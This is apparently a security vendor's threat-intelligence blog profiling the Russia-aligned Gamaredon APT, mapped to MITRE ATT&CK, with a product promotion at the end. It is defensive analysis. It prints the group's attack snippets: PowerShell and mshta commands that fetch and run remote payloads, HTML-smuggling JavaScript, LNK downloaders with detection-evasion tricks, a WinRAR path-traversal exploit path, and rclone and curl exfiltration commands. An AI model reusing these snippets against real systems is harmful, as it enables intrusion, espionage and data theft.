Gamaredon (Primitive Bear) APT Profile and MITRE ATT&CK Breakdown

Umut Bayram | 18 MIN READ

| July 11, 2026

Key Takeaways

  • Gamaredon is a Russia-aligned APT active since 2013, widely attributed to Russia's Federal Security Service.
  • The group attempted to infect over 1,500 Ukrainian government systems and ran 5,000 attacks by late 2021.
  • Gamaredon targets NATO members Bulgaria, Latvia, Lithuania, and Poland alongside its sustained Ukrainian espionage campaigns.
  • The group acts as an access broker, breaching Ukrainian machines to hand initial access to the Turla APT.
  • The Picus Platform lets teams simulate Gamaredon's tactics and validate security controls against this threat group.

Gamaredon (aka Primitive Bear) is a Russia-aligned advanced persistent threat (APT) group active since 2013 and widely attributed to Russia's Federal Security Service (FSB).

Focused on cyber espionage and data theft, the group has run sustained operations against Ukrainian government, defense, law enforcement, and critical infrastructure targets, having attempted to infect over 1,500 government systems by late 2021.

Its reach extends to NATO member states, including Bulgaria, Latvia, Lithuania, and Poland, and to Russian-speaking individuals across former Soviet states such as Uzbekistan, Kazakhstan, Tajikistan, and Kyrgyzstan, whom it surveils with the BoneSpy and PlainGnome Android spyware families.

Gamaredon has also served as an access broker for other Russian actors, breaching machines in Ukraine to hand initial access to the Turla APT.

In this blog, we will examine Gamaredon's major campaigns and break down its tactics, techniques, and procedures (TTPs). In the end, we will show how Picus Platform validates your security controls against this threat group.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the Gamaredon?

2013 – Gamaredon begins operations, targeting Ukrainian government institutions for cyber espionage and data theft.

2021 – Fields the BoneSpy Android spyware, its first mobile surveillance tool, against Russian-speaking targets.

By November 2021 – Has carried out no fewer than 5,000 cyberattacks against Ukrainian public authorities and critical infrastructure and attempted to infect over 1,500 government systems.

August 2022 – Runs a targeted phishing operation against Ukrainian government, defense, and law enforcement agencies, deploying the Giddome and Pterodo malware families for long-term access.

December 2022 – Unsuccessfully attempts to breach a petroleum refining company within a NATO member state.

February 2023 – Runs GammaLoad and GammaSteel campaigns delivered through spear-phishing RAR archives, while also attempting to infiltrate NATO countries.

August 2024 – Introduces PteroGraphin, a PowerShell persistence tool that abuses Microsoft Excel add-ins, scheduled tasks, and the Telegraph API for C2.

September 2024 – Uses Cloudflare Tunnels in attacks against Ukraine and the NATO countries Bulgaria, Latvia, Lithuania, and Poland.

December 2024 – Deploys the Android spyware families BoneSpy and PlainGnome against Russian-speaking victims across former Soviet states such as Uzbekistan, Kazakhstan, Tajikistan, and Kyrgyzstan.

January 2025 – Breaches four machines in Ukraine, providing Turla APT with initial access.

February 26, 2025 – Begins an intrusion against a Western country's military mission in Ukraine, using an infected removable drive to deploy an updated GammaSteel [8].

March 2025 – Runs a campaign using Russian troop-movement lures to distribute LNK files and DLL side-load the Remcos RAT via geo-fenced servers in Russia and Germany.

January 2026 – Exploits the WinRAR path-traversal flaw CVE-2025-8088 to deliver the GammaPhish HTA payload, the GammaLoad VBScript downloader, the GammaWorm USB/LNK worm, and GammaSteel.

Which MITRE ATT&CK Techniques Are Used by Gamaredon?

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

Gamaredon continuously registers throwaway command-and-control (C2) domains, overwhelmingly under the .ru TLD, to stay ahead of domain-based blocklists.

Recent tradecraft pairs each operational domain with a "twin" domain registered on the same day, through the same registrar, and behind the same nameserver pair. Fallback C2 domains such as kosoyed[.]ru and kosoyed[.]online are registered simultaneously via REG.RU, sharing the Cloudflare nameserver pair doug.ns.cloudflare.com / fay.ns.cloudflare.com.

This .ru + .online dual-TLD registration pattern has been consistent across the group's fallback C2 domains for well over a year [1].

T1583.003 Acquire Infrastructure: Virtual Private Server

Gamaredon rents VPS instances from a rotating set of hosting providers to stand up its C2 servers. Historical infrastructure resolves to providers such as DigitalOcean, MivoCloud, TimeWeb, and "Global Internet Solutions LLC," with IP addresses changing frequently.

T1583.006 Acquire Infrastructure: Web Services

Rather than exposing owned infrastructure directly, Gamaredon fronts its staging and beaconing behind legitimate, disposable web services. It provisions Cloudflare Workers domains (*.workers.dev) shortly before each spearphishing wave, using the Workers domain as Stage 1 (delivery of GammaLoad, the group's custom downloader) and Stage 2 (beacon).

The group has also long abused Telegram channels, the Telegram publishing platform telegra.ph, teletype.in, and Cloudflare/ngrok tunneling services as intermediaries for resolving or reaching C2.

T1584.001 Compromise Infrastructure: Domains

Beyond registering fresh domains, Gamaredon hijacks aged, legitimate domains to inherit their clean reputation. The parked domain joymobile.com[.]ua (registered in 2020 to a small mobile retailer) was taken over via the owner's compromised registrar account.

T1586.002 Compromise Accounts: Email Accounts

Gamaredon frequently sends spearphishing from genuine, compromised mailboxes belonging to Ukrainian governmental, law-enforcement, and justice-system users.

In one wave, the operator authenticated to the legitimate hosting service freehost.com[.]ua with the stolen credentials of a city council mayor's office to relay malicious mail.

T1587.001 Develop Capabilities: Malware

Gamaredon develops its own malware rather than relying on commodity implants, auto-generating and parameterizing each build per wave so that high sample volume masks largely identical functionality.

Its most significant custom implants are GammaDrop, a VBScript dropper; GammaLoad, the VBScript/HTA downloader it delivers; and GammaSteel, a PowerShell infostealer [1][2]. These sit alongside the broad Ptero* family, dozens of PowerShell, VBScript, and C tools spanning downloaders, USB weaponizers, credential and messaging-app stealers, reverse shells, and proxies (for example PteroLNK, which spreads via removable drives) [4].

T1588.002 Obtain Capabilities: Tool

Gamaredon supplements custom malware with off-the-shelf and open-source tooling: the Remcos commercial backdoor [3]; the ReVBShell open-source VBScript reverse shell; the rclone cloud sync utility; the Cloudflare Tunnel client (cloudflared) and ngrok; and code lifted from the Amsi-Bypass-Powershell and Invoke-SocksProxy GitHub projects [4].

Tactic: Initial Access

T1091 Replication Through Removable Media

Gamaredon's PteroLNK weaponizer also drops LNK files onto every connected USB drive so the malware spreads to any machine into which the drive is later plugged.

Enticing double-extension filenames in English and Ukrainian (for example, Login_Password, мoбілізaція / "mobilization", записи_розмов / "conversation_records") are used to lure victims into clicking.

T1566.001 Phishing: Spearphishing Attachment

Gamaredon delivers RAR archives attached to spearphishing emails. A representative attachment, Судова_повістка_1_13_4_1882_18.03.2026.rar, carried a Ukrainian court-summons lure and exploited a WinRAR path-traversal flaw on extraction [1].

One campaign distributed LNK files compressed inside ZIP archives, disguised as Office documents with war-themed Russian and Ukrainian names referencing troop movements (for example Позиции противника запад и юго-запад.xlsx.lnk, "Positions of the enemy west and southwest") [3].

Gamaredon has also attached RAR/ZIP/7z/TAR archives each containing a single LNK, later switching to HTA attachments and then to HTML-smuggling attachments [4].

Tactic: Execution

T1047 Windows Management Instrumentation

GammaLoad queries WMI to fingerprint the host, retrieving the system-drive volume serial number [1]:

' GammaLoad host-profiling WMI query, with an FSO fallback

' Select VolumeSerialNumber from Win32_LogicalDisk Where DeviceID = '<%SYSTEMDRIVE%>'

' Fallback: Scripting.FileSystemObject.GetDrive().SerialNumber

One intrusion used a WMI ping query as an execution guard, only proceeding if mil.gov.ua was reachable [2]:

' "Select * From Win32_PingStatus where Address = 'mil.gov.ua'"

The PteroLNK weaponizer also uses WMI to enumerate removable drives [4]:

SELECT * FROM Win32_LogicalDisk WHERE MediaType = NULL

T1059.001 Command and Scripting Interpreter: PowerShell

PowerShell is Gamaredon's primary implementation language for modern tooling.

During one intrusion, it fetched and executed a remote script directly in memory [2]:

# Base64/obfuscated server response launches an in-memory PowerShell stage


"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" `
sleep 15; `
$url='http://64[.]23[.]190[.]235/getinfo.php'; `
$discord = (New-Object system.Net.WebClient).downloadString($url); `
$discord | iex

Gamaredon's broader Ptero* toolset is overwhelmingly PowerShell, routinely executing received code via Invoke-Expression.

T1059.007 Command and Scripting Interpreter: JavaScript

One intrusion executed a JavaScript one-liner via mshta.exe to spawn the VBScript chain [2]:

// mshta JavaScript stager: run a decoy explorer window, then the VBScript payload

w = new ActiveXObject("WScript.Shell");

w.run("explorer files");

w.run("wscript.exe //e:vbScript \\~.drv");

window.close();

HTML-smuggling attachments used JavaScript to rebuild a base64-embedded RAR client-side and trigger its download without any network fetch [4]:

// HTML smuggling: decode an embedded archive and force a "download" locally

var g4Y = navigator["platform"];

if (['Win32','Win64','Windows','WinCE'].indexOf(g4Y) == -1) die(); // only on Windows

var Xul = document.createElement('a');

pSI = "UEsDBAoAAAAABdjCVc..."; // base64 RAR blob

Xul.href = 'data:application/x-rar-compressed;base64, ' + pSI;

Xul.download = "1532_08-08-2023.rar";

Xul.click(); // auto-download

var img = document.createElement("img");

// tracking

img.src = "http://94[.]198[.]221[.]21/mo.09.08";

T1106 Native API

PteroCDrop (a C dropper) writes its starter script and VBScript payload to disk and launches them through the CreateProcess Windows API rather than a shell.

PteroPowder (a C++ downloader) fetches a PowerShell script and launches it via ShellExecuteA with -ExecutionPolicy Bypass.

An example for illustration is given below:

/* Native-API process launch */

ShellExecuteA(NULL, "open", "powershell.exe", "-ExecutionPolicy Bypass <downloaded_script>", NULL, SW_HIDE);

T1203 Exploitation for Client Execution

Gamaredon weaponizes RAR archives to exploit CVE-2025-8088, a WinRAR directory-traversal vulnerability.

The archive holds a benign-looking decoy PDF plus a VBScript payload stored as an NTFS alternate data stream whose stream name embeds a path-traversal sequence. On extraction, WinRAR resolves the stream name as a file path and writes the VBScript into the user's Startup folder:

# ADS stream name doubles as a traversal path, landing the .vbs in Startup

Судова_повістка_..._18.03.2026.pdf:..\..\..\..\..\..\AppData\Roaming\Microsoft\Windows\..\..\Microsoft\Windows\StartMenu\Programs\..\Programs\..\Programs\Startup\1_13_4_1882_18.03.2026.vbs

The redundant \Programs\..\Programs\..\Programs\ sequence is a Gamaredon-specific quirk that defeats WinRAR's traversal mitigations.

T1204.002 User Execution: Malicious File

Gamaredon relies on the victim opening a malicious file. Shortcuts (.lnk) are a primary vector: double-clicking one runs a hidden-window PowerShell downloader carried in the shortcut's command line [3]:

# LNK-embedded PowerShell downloader (string-broken to evade static AV)

Powershell.exe -WindowStyle hidden `

echo <some_noise>;

Write-Host <som_other_noise>;

...

&(gcm i*wr) -uri http://staging-server/<payload>.zip -OutFile <payload>.zip # gcm -> Invoke-WebRequest

};

Expand-Archive -Path <payload>.zip -DestinationPath <destionation_folder>;

start <side-loader>.exe

&(gcm *ke-*est) -uri http://staging-server/path/to/<decoy>.doc -OutFile <decoy>.doc;

start <decoy>.doc # decoy document

Note the Get-Command (gcm) wildcard indirection (gcm i*wr -> Invoke-WebRequest, gcm *ke-*est -> Invoke-RestMethod), which resolves cmdlet names at runtime to bypass string-based detection.

Tactic: Persistence

T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)

Some PteroSand samples persist by writing a command line to the HKCU\Environment\UserInitMprLogonScript value, which Windows executes at logon.

T1053.005 Scheduled Task/Job: Scheduled Task

Scheduled tasks are a recurring persistence and re-execution mechanism for the Gameradon threat group.

An example command can be:

# Recurring task for downloader re-execution

schtasks /create /tn "UpdateService" /tr "wscript.exe %APPDATA%\<downloader>.vbs" /sc minute /mo 5 /f

T1137.001 Office Application Startup: Office Template Macros

PteroTemplate weaponizes the global Word template Normal.dotm by killing Word (taskkill /f /im WINWORD.EXE), enabling macros via the registry, and injecting a malicious VBA document_close procedure.

Every document based on the default template then drops and runs a VBScript downloader each time it is closed [4].

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Run keys and the Startup folder are Gamaredon's most common persistence surfaces. GammaLoad establishes persistence through a RunOnce key that re-launches its dropped payload:

# GammaLoad RunOnce persistence

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\...

GammaSteel registered itself under the Run key:

HKCU\...\CurrentVersion\Run\[USERNAME]

Additionally, the CVE-2025-8088 exploit also achieves persistence directly by dropping GammaDrop into the Startup folder.

Tactic: Stealth

T1027.006 Obfuscated Files or Information: HTML Smuggling

An HTML email attachment lure used by Gamaredon carries a base64-encoded RAR inside its JavaScript, which is decoded and "downloaded" locally with no network request.

T1027.011 Obfuscated Files or Information: Fileless Storage

Gamaredon frequently stores payload fragments in the registry to avoid on-disk artifacts.

GammaSteel splits its payload across many HKCU\Software values (base64-encoded, one function per value) [2]:

# GammaSteel registry-resident payload fragments

Set-ItemProperty -Path 'HKCU:\Software' -Name 'exampleName' -Value 'part_of_the_payload'

T1027.013 Obfuscated Files or Information: Encrypted/Encoded File

Downloaded PE and VBScript payloads are XOR-encrypted with the system drive's volume serial number as the key.

GammaSteel and other tools base64-encode data before use and storage.

T1036.004 Masquerading: Masquerade Task or Service

Persistence artifacts are given benign, product-like names to blend in.

Run-key values such as UpdateService, Windows Sort Updater, and BoxerProtocol are used.

Also, as registry containers’ names, they masqueraded legitimate software (HKCU\Software\FedFox).

T1036.007 Masquerading: Double File Extension

Both the LNK and USB campaigns use double extensions so a shortcut appears to be a document: .docx.lnk and .rtf.lnk.

T1112 Modify Registry

PteroDoc and PteroTemplate weaken Office security by setting AccessVBOM and VBAWarnings to 1 under HKCU\Software\Microsoft\Office\<WordVersion>\Word\Security\.

GammaSteel modified Explorer\Advanced values (Hidden, ShowSuperHidden, HideFileExt) so dropped files stay invisible [2].

T1218.005 System Binary Proxy Execution: Mshta

mshta.exe is central to Gamaredon execution across every campaign: it proxies remote HTA execution from LNK attachments:

# LNK shortcut target proxying a remote HTA through mshta

%WINDIR%\System32\mshta.exe http://<domain>[.]ru/path/to/remote_payload.hta

T1480.001 Execution Guardrails: Environmental Keying

Payloads are keyed to the victim host: the XOR key for encrypted PE/VBScript payloads is the system drive's volume serial number, so a payload captured off-host cannot be decrypted without it.

Payload servers are additionally geo-fenced to Ukrainian victims, returning HTTP 403 to requests from other regions [3].

Tactic: Credential Access

T1539 Steal Web Session Cookie

PteroCookie steals cookie stores from Opera, Firefox, Chrome, and Edge.

For the Chromium browsers, it grabs the encrypted Cookies file plus the Local State key and decrypts the key on-host with:

[System.Security.Cryptography.ProtectedData]::Unprotect # In Windows Data Protection API (DPAPI)

For Firefox, it exfiltrates cookies.sqlite from every profile.

T1552.002 Unsecured Credentials: Credentials in Registry

PteroSteal locates Outlook profiles by enumerating HKCU\SOFTWARE\Microsoft\Office for an IMAP Password value, then exfiltrates account details and the DPAPI-decrypted IMAP Password [4].

T1555.003 Credentials from Password Stores: Credentials from Web Browsers

PteroSteal harvests stored credentials from Opera, Edge, Chrome, and Firefox (and, in some variants, the Outlook and The Bat! mail clients).

For Chromium browsers, it pulls Login Data plus the Local State key and DPAPI-decrypts it.

For Firefox, it takes key3.db, key4.db, logins.json, and cert9.db from each profile [4].

Tactic: Discovery

T1518.001 Software Discovery: Security Software Discovery

PteroScout and the GammaSteel recon stage identify installed security products via WMI:

SELECT * FROM AntiVirusProduct

Tactic: Lateral Movement

T1080 Taint Shared Content

Gamaredon deliberately weaponizes files it expects to be shared.

PteroDoc attaches a malicious remote-template reference to every .doc/.docx on removable, network, and fixed drives, so the infection travels whenever a document is forwarded within or outside the organization.

T1091 Replication Through Removable Media

PteroLNK spreads by copying itself and dropping lure LNK files onto connected USB drives. Clicking a dropped LNK re-executes the malware on the next host.

Tactic: Collection

T1005 Data from Local System

The final GammaSteel payload enumerates Desktop, Documents, and Downloads and collects files matching a hardcoded extension list:

*.doc, *.docx, *.xls, *.xlsx, *.ppt, *.pptx, *.vsd, *.vsdx, *.rtf, *.odt, *.txt, *.pdf

Dedicated stealers also lift application data from Signal (%APPDATA%\Signal\sql\db.sqlite plus config.json), Telegram Desktop (tdata), and browser IndexedDB/LevelDB stores [4].

T1025 Data from Removable Media

PteroPSDoor continuously searches connected USB drives for the target extensions and stages matching files for later exfiltration.

T1039 Data from Network Shared Drive

PteroPSDoor and PteroVDoor search all mapped drives (excluding letters such as A, B, and Q) and immediately exfiltrate matching documents.

T1074.001 Data Staged: Local Data Staging

PteroPSDoor copies harvested files to a frequently renamed staging directory before upload and maintains a "custom database" (a text file of MD5 hashes computed from file path, size, and last-write time) to avoid re-exfiltrating the same file.

T1113 Screen Capture

PteroScreen captures all monitors to %TEMP%\<rand>.png, base64-encodes the image, and uploads it to C2.

PteroScout and the GammaSteel recon stage also grab screenshots as part of host profiling. GammaSteel, for example, captures the screen via System.Drawing, splitting property names to dodge AV [2]:

# GammaSteel screenshot capture via System.Drawing

$b = [System.Windows.Forms.SystemInformation]::PrimaryMonitorSize

$w = $b.("Wi","dt","h" -join ""); $h = $b.("H","ei","g","ht" -join "")

$Image = New-Object System.Drawing.Bitmap($w,$h)

$g = [System.Drawing.Graphics]::FromImage($Image)

Tactic: Command and Control

T1008 Fallback Channels

GammaLoad is configured with a primary Cloudflare Workers C2 and a .ru fallback (behind Cloudflare); if the primary returns a body under 75 characters or HTTP 404, it sleeps 10 seconds and switches to the fallback.

T1071.001 Application Layer Protocol: Web Protocols

All campaigns beacon and exfiltrate over HTTP/HTTPS.

For example, GammaLoad issues GET requests to freshly randomized URLs and encodes victim data in the User-Agent header [1]:

# GammaLoad beacon: victim ID and check-in time smuggled in the User-Agent

GET /k8f2ma.mov HTTP/1.1

User-Agent: Mozilla/5.0 ...Safari/537.36::WORKSTATION01_A30BDCA3::/.v4/7/2026 4:19:00 PM/.

T1095 Non-Application Layer Protocol

PteroPShell is a bare TCP reverse shell that connects to a predefined IP and port, reads a command, runs it through Invoke-Expression, and returns the output.

T1102.001 Web Service: Dead Drop Resolver

Gamaredon publishes its live C2 address on legitimate services and reads it at runtime.

For example, GammaSteel resolves C2 from teletype.in, telegra.ph, and a Telegram channel, parsing markers such as ==107@189@19@137== [2].

T1568 Dynamic Resolution

Beyond fast flux, GammaLoad samples reference dynamic-DNS hostnames ( ddnsking[.]com, ddns[.]net) and use check-host[.]net to resolve fast-flux domains to their current IP.

T1572 Protocol Tunneling

The group tunnels C2 through legitimate services to hide the true destination.

PteroPSLoad ran the Cloudflare Tunnel client (cloudflared --url http://<ip>:80) and, in another version, ngrok, both on the free tier, so the request to the C2 no longer originated directly from PowerShell and carried no destination IP in the Host header [4].

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

PteroPSDoor and PteroVDoor exfiltrate collected files directly over their HTTP(S) C2 channel via POST, and GammaSteel's primary path is a PowerShell web request to the same C2 that tasks it.

T1048 Exfiltration Over Alternative Protocol

When the primary web request fails, the updated GammaSteel falls back to cURL over a Tor SOCKS proxy (curl.exe -x socks5://…), packing host metadata and the file into multipart form fields.

T1567 Exfiltration Over Web Service

GammaSteel contains code that posts data to the write.as publishing API as a possible exfiltration channel [2]:

# write.as exfil attempt embedded in GammaSteel

POST https://write.as/api/posts

Content-Type: application/json

{"body": "This is a post.", "title": "My First Post"}

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

PteroClone uses rclone to synchronize local directories to attacker-controlled folders on MEGA cloud storage, and pulls staged payloads back down the same way [4]:

# PteroClone rclone sync to/from MEGA

rclone sync %APPDATA%\Microsoft\Windows\SendTo mega:<pc_name>-d --no-console

rclone sync %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup mega:<pc_name> --

How Picus Simulates Gamaredon Attacks?

We strongly suggest simulating Gamaredon Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Gamaredon:

Threat ID

Threat Name

Attack Module

48845

Gamaredon Threat Group Campaign

Windows Endpoint

59460

EvilGnome Malware Campaign

Linux Endpoint

56432

Gamaredon Threat Group Campaign Malware Download Threat - 2

Network Infiltration

39135

Gamaredon Threat Group Campaign Malware Email Threat - 2

E-mail Infiltration

25385

Gamaredon Threat Group Campaign Dropper Download Threat

Network Infiltration

70257

Gamaredon Threat Group Campaign Dropper Email Threat

E-mail Infiltration

79145

Gamaredon Threat Group Campaign Infostealer Download Threat

Network Infiltration

28837

Gamaredon Threat Group Campaign Infostealer Email Threat

E-mail Infiltration

83542

Gamaredon Threat Group Campaign Malware Download Threat - 1

Network Infiltration

80763

Gamaredon Threat Group Campaign Malware Email Threat - 1

E-mail Infiltration

74593

Gamaredon Threat Group Campaign Downloader Download Threat

Network Infiltration

78040

Gamaredon Threat Group Campaign Downloader Email Threat

E-mail Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Platform.

What Are the Aliases of the Gamaredon Group?

Gamaredon is also known as: PRIMITIVE BEAR, Shuckworm, ACTINIUM, Actinium, Aqua Blizzard, Armageddon, Blue Otso, BlueAlpha, DEV-0157, G0047, Gamaredon, IRON TILDEN, SectorC08, Trident Ursa, UAC-0010, UNC530, Winterflounder.

References

[1] “Website.” [Online]. Available: https://harfanglab.io/insidethelab/gamaredon-gammadrop-gammaload/

[2] “Shuckworm Targets Foreign Military Mission Based in Ukraine.” Accessed: Jul. 08, 2026. [Online]. Available: https://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel

[3] G. Venere, “Gamaredon campaign abuses LNK files to distribute Remcos backdoor,” Cisco Talos Blog. Accessed: Jul. 08, 2026. [Online]. Available: https://blog.talosintelligence.com/gamaredon-campaign-distribute-remcos/

[4] “[No title].” Accessed: Jul. 08, 2026. [Online]. Available: https://web-assets.esetstatic.com/wls/en/papers/white-papers/cyberespionage-gamaredon-way.pdf

 
Gamaredon, also known as Primitive Bear, is a Russia-aligned advanced persistent threat group active since 2013. It is widely attributed to Russia's Federal Security Service and focuses on cyber espionage and data theft, primarily against Ukrainian government, defense, law enforcement, and critical infrastructure targets.
Gamaredon's reach extends to NATO member states including Bulgaria, Latvia, Lithuania, and Poland. It also surveils Russian-speaking individuals across former Soviet states such as Uzbekistan, Kazakhstan, Tajikistan, and Kyrgyzstan using the BoneSpy and PlainGnome Android spyware families.
Gamaredon has served as an access broker for other Russian actors. In January 2025, it breached four machines in Ukraine and handed initial access to the Turla APT, showing coordination between Russia-aligned groups.
Gamaredon develops custom malware rather than relying on commodity implants. Its most significant tools are GammaDrop, a VBScript dropper, GammaLoad, a VBScript and HTA downloader, and GammaSteel, a PowerShell infostealer, alongside the broader Ptero family of PowerShell, VBScript, and C tools.
Gamaredon primarily uses spearphishing emails carrying RAR, ZIP, or LNK attachments, often with war-themed or official-sounding lures. A January 2026 campaign exploited the WinRAR path traversal flaw CVE-2025-8088 to deliver malicious payloads upon extraction.
Gamaredon relies heavily on legitimate web services to hide its infrastructure, including Cloudflare Workers, Telegram, telegra.ph, teletype.in, and dynamic DNS providers. It also uses fallback channels and protocol tunneling through services like Cloudflare Tunnel and ngrok to avoid detection.
The Picus Platform allows security teams to simulate Gamaredon's attack techniques and validate their security controls against this threat group. The Picus Threat Library includes multiple ready-to-use Gamaredon threats covering email, network, and endpoint attack modules.

Table of Contents

Ready to start? Request a demo